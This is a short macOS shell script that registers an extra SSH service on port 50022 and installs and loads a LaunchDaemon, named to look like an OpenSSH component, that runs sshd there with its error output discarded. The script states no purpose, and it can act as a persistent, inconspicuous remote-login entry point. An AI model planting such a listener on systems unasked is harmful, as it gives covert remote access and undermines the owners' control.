#!/bin/sh
mkdir -p /tmp/Localssh
if [ -d /tmp/Localssh ]; then
    chmod 722 /tmp/Localssh
    cp /etc/services /tmp/Localssh/services_backup
fi

if [ -s /tmp/Localssh/services_backup ]; then
echo "ssh-vsz       50022/udp     # SSH Remote Login Protocol VSZ">>/etc/services
echo "ssh-vsz       50022/tcp     # SSH Remote Login Protocol VSZ">>/etc/services
fi
cat << "EOF" > /Library/LaunchDaemons/com.openssh.sshd_vsz.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">

<dict>
    <key>Label</key>
    <string>com.openssh.sshd_vsz</string>

    <key>Program</key>
    <string>/usr/libexec/sshd-keygen-wrapper</string>

    <key>ProgramArguments</key>
    <array>
        <string>/usr/sbin/sshd</string>
        <string>-i</string>
    </array>

    <key>SessionCreate</key>
    <true/>

    <key>Sockets</key>
    <dict>
        <key>Listeners</key>
        <dict>
            <key>SockServiceName</key>
            <string>ssh-vsz</string>
        </dict>
    </dict>

    <key>StandardErrorPath</key>
    <string>/dev/null</string>

    <key>inetdCompatibility</key>
    <dict>
        <key>Wait</key>
        <false/>
    </dict>
</dict>
</plist>
EOF
launchctl load /Library/LaunchDaemons/com.openssh.sshd_vsz.plist
